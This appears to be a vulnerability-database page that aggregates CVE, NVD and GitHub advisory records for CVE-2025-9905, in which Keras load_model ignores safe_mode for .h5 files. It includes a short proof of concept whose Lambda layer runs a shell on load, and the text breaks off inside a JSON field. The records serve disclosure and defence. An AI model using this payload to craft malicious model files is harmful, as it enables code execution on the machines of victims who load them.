cvelistv5 - cve-2025-9905

CVE-2025-9905 (GCVE-0-2025-9905)

Vulnerability from cvelistv5

Published

2025-09-19 08:16

Modified

2025-09-20 03:55

Severity ?

7.3 (High) - CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE

CWE-913 - Improper Control of Dynamically-Managed Code Resources

Summary

The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True. One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives. Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.

References

▼	URL	Tags
	cve-coordination@google.com	https://github.com/keras-team/keras/pull/21602	Issue Tracking, Patch
	cve-coordination@google.com	https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	Keras-team	Keras	Version: 3.0.0 ≤ 3.11.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-9905",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-09-19T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-09-20T03:55:40.926Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/keras-team/keras",
          "defaultStatus": "unaffected",
          "packageName": "keras",
          "product": "Keras",
          "repo": "https://github.com/keras-team/keras",
          "vendor": "Keras-team",
          "versions": [
            {
              "lessThanOrEqual": "3.11.2",
              "status": "affected",
              "version": "3.0.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Gabriele Digregorio"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eThe Keras \u003ccode\u003eModel.load_model\u003c/code\u003e\u0026nbsp;method can be exploited to achieve arbitrary code execution, even with \u003ccode\u003esafe_mode=True\u003c/code\u003e.\u003c/p\u003e\u003cp\u003eOne can create a specially crafted \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;model archive that, when loaded via \u003ccode\u003eModel.load_model\u003c/code\u003e, will trigger arbitrary code to be executed.\u003c/p\u003e\u003cp\u003eThis is achieved by crafting a special \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archive file that uses the \u003ccode\u003eLambda\u003c/code\u003e\u0026nbsp;layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the \u003ccode\u003esafe_mode=True\u003c/code\u003e\u0026nbsp;option is not honored when reading \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archives.\u003c/p\u003e\u003cp\u003eNote that the \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;format is a legacy format supported by Keras 3 for backwards compatibility.\u003c/p\u003e\u003cbr\u003e"
            }
          ],
          "value": "The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-175",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-175 Code Inclusion"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "attackVector": "LOCAL",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-913",
              "description": "CWE-913 Improper Control of Dynamically-Managed Code Resources",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-19T08:16:44.772Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/keras-team/keras/pull/21602"
        },
        {
          "url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Arbitary Code execution in Keras load_model()",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2025-9905",
    "datePublished": "2025-09-19T08:16:44.772Z",
    "dateReserved": "2025-09-03T07:27:18.212Z",
    "dateUpdated": "2025-09-20T03:55:40.926Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-9905\",\"sourceIdentifier\":\"cve-coordination@google.com\",\"published\":\"2025-09-19T09:15:36.033\",\"lastModified\":\"2025-09-23T16:53:40.050\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\\n\\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\\n\\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\\n\\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.3,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-913\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:keras:keras:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.11.3\",\"matchCriteriaId\":\"315FD6FA-C1F3-47FD-AE5D-DF4D556D657F\"}]}]}],\"references\":[{\"url\":\"https://github.com/keras-team/keras/pull/21602\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-9905\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-19T11:47:46.060479Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-19T11:48:23.572Z\"}}], \"cna\": {\"title\": \"Arbitary Code execution in Keras load_model()\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Gabriele Digregorio\"}], \"impacts\": [{\"capecId\": \"CAPEC-175\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-175 Code Inclusion\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 7.3, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"HIGH\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/keras-team/keras\", \"vendor\": \"Keras-team\", \"product\": \"Keras\", \"versions\": [{\"status\": \"affected\", \"version\": \"3.0.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"3.11.2\"}], \"packageName\": \"keras\", \"collectionURL\": \"https://github.com/keras-team/keras\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/keras-team/keras/pull/21602\", \"tags\": [\"patch\"]}, {\"url\": \"https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"The Keras Model.load_model\\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\\n\\nOne can create a specially crafted .h5/.hdf5\\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\\n\\nThis is achieved by crafting a special .h5\\u00a0archive file that uses the Lambda\\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\\u00a0option is not honored when reading .h5\\u00a0archives.\\n\\nNote that the .h5/.hdf5\\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cp\u003eThe Keras \u003ccode\u003eModel.load_model\u003c/code\u003e\u0026nbsp;method can be exploited to achieve arbitrary code execution, even with \u003ccode\u003esafe_mode=True\u003c/code\u003e.\u003c/p\u003e\u003cp\u003eOne can create a specially crafted \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;model archive that, when loaded via \u003ccode\u003eModel.load_model\u003c/code\u003e, will trigger arbitrary code to be executed.\u003c/p\u003e\u003cp\u003eThis is achieved by crafting a special \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archive file that uses the \u003ccode\u003eLambda\u003c/code\u003e\u0026nbsp;layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the \u003ccode\u003esafe_mode=True\u003c/code\u003e\u0026nbsp;option is not honored when reading \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archives.\u003c/p\u003e\u003cp\u003eNote that the \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;format is a legacy format supported by Keras 3 for backwards compatibility.\u003c/p\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-913\", \"description\": \"CWE-913 Improper Control of Dynamically-Managed Code Resources\"}]}], \"providerMetadata\": {\"orgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"shortName\": \"Google\", \"dateUpdated\": \"2025-09-19T08:16:44.772Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-9905\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-20T03:55:40.926Z\", \"dateReserved\": \"2025-09-03T07:27:18.212Z\", \"assignerOrgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"datePublished\": \"2025-09-19T08:16:44.772Z\", \"assignerShortName\": \"Google\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

fkie_cve-2025-9905

Vulnerability from fkie_nvd

Published

2025-09-19 09:15

Modified

2025-09-23 16:53

Severity ?

7.3 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Summary

References

▼	URL	Tags
	cve-coordination@google.com	https://github.com/keras-team/keras/pull/21602	Issue Tracking, Patch
	cve-coordination@google.com	https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	keras	keras	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:keras:keras:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "315FD6FA-C1F3-47FD-AE5D-DF4D556D657F",
              "versionEndExcluding": "3.11.3",
              "versionStartIncluding": "3.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility."
    }
  ],
  "id": "CVE-2025-9905",
  "lastModified": "2025-09-23T16:53:40.050",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.3,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "HIGH",
          "attackRequirements": "PRESENT",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "HIGH",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "cve-coordination@google.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-09-19T09:15:36.033",
  "references": [
    {
      "source": "cve-coordination@google.com",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/keras-team/keras/pull/21602"
    },
    {
      "source": "cve-coordination@google.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
    }
  ],
  "sourceIdentifier": "cve-coordination@google.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-913"
        }
      ],
      "source": "cve-coordination@google.com",
      "type": "Secondary"
    }
  ]
}

ghsa-36rr-ww3j-vrjv

Vulnerability from github

Published

2025-09-19 20:12

Modified

2025-09-19 20:12

Severity ?

8.7 (High) - CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Summary

The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

Details

Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.

Summary

When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.

From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.

Details

Intended behaviour

According to the official Keras documentation, safe_mode is defined as:

safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True. I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

Technical Details

Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here's the relevant snippet:

```python def load_model(filepath, custom_objects=None, compile=True, safe_mode=True): is_keras_zip = ... is_keras_dir = ... is_hf = ...

# Support for remote zip files
if (
    file_utils.is_remote_path(filepath)
    and not file_utils.isdir(filepath)
    and not is_keras_zip
    and not is_hf
):
    ...

if is_keras_zip or is_keras_dir or is_hf:
    ...

if str(filepath).endswith((".h5", ".hdf5")):
    return legacy_h5_format.load_model_from_hdf5(
        filepath, custom_objects=custom_objects, compile=compile
    )

```

As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.

Solution

Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.

PoC

From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:

```python import keras

f = lambda x: ( exec("import os; os.system('sh')"), x, )

model = keras.Sequential() model.add(keras.layers.Input(shape=(1,))) model.add(keras.layers.Lambda(f)) model.compile()

keras.saving.save_model(model, "./provola.h5") ```

From the victim’s side, triggering code execution is just as simple:

```python import keras

model = keras.models.load_model("./provola.h5", safe_mode=True) ```

That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.

As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

Attack scenario

The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.11.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-19T20:12:05Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I\u2019ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response.\n\n---\n\n## Summary\n\nWhen a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras application. This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique\u2014`.h5` and `.hdf5` files are simply not checked for unsafe code execution.\n\nFrom this point on, I will refer only to the `.h5` file format, though everything equally applies to `.hdf5`.\n\n## Details\n\n### Intended behaviour \nAccording to the official Keras documentation, `safe_mode` is defined as:\n\n```\nsafe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.\n```\nI understand that the behavior described in this report is somehow **intentional**, as `safe_mode` is only applicable to `.keras` models. \n\nHowever, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. `.h5` files can still be loaded seamlessly using `load_model` with `safe_mode=True`, and the absence of any warning or error creates a **false sense of security**. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if `safe_mode` cannot be applied to a given file format, an explicit error should be raised to alert the user.\n\nThis issue is particularly critical given the widespread use of the `.h5` format, despite the introduction of newer formats.\n\nAs a small anecdotal test, I asked several of my colleagues what they would expect when loading a `.h5` file with `safe_mode=True`. None of them expected the setting to be **silently** ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers\u2014experts in binary or ML security\u2014and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.\n\n### Technical Details\n\nExamining the implementation of `load_model` in `keras/src/saving/saving_api.py`, we can see that the `safe_mode` parameter is completely ignored when loading `.h5` files. Here\u0027s the relevant snippet:\n\n```python\ndef load_model(filepath, custom_objects=None, compile=True, safe_mode=True):\n    is_keras_zip = ...\n    is_keras_dir = ...\n    is_hf = ...\n\n    # Support for remote zip files\n    if (\n        file_utils.is_remote_path(filepath)\n        and not file_utils.isdir(filepath)\n        and not is_keras_zip\n        and not is_hf\n    ):\n        ...\n\n    if is_keras_zip or is_keras_dir or is_hf:\n        ...\n\n    if str(filepath).endswith((\".h5\", \".hdf5\")):\n        return legacy_h5_format.load_model_from_hdf5(\n            filepath, custom_objects=custom_objects, compile=compile\n        )\n```\n\nAs shown, when the file format is `.h5` or `.hdf5`, the method delegates to `legacy_h5_format.load_model_from_hdf5`, which does not use or check the `safe_mode` parameter at all.\n\n### Solution\n\nSince the release of the new `.keras` format, I believe the simplest and most effective way to address this misleading behavior\u2014and to improve security in Keras\u2014is to have the `safe_mode` parameter raise an **explicit error** when `safe_mode=True` is used with `.h5`/`.hdf5` files. This error should be clear and informative, explaining that the legacy format does not support `safe_mode` and outlining the associated risks of loading such files.\n\nI recognize this fix may have minor backward compatibility considerations.\n\nIf you confirm that you\u0027re open to this approach, I\u2019d be happy to open a PR that includes the missing check.\n\n\n## PoC\n\nFrom the attacker\u2019s perspective, creating a malicious `.h5` model is as simple as the following:\n\n```python\nimport keras\n\nf = lambda x: (\n    exec(\"import os; os.system(\u0027sh\u0027)\"),\n    x,\n)\n\nmodel = 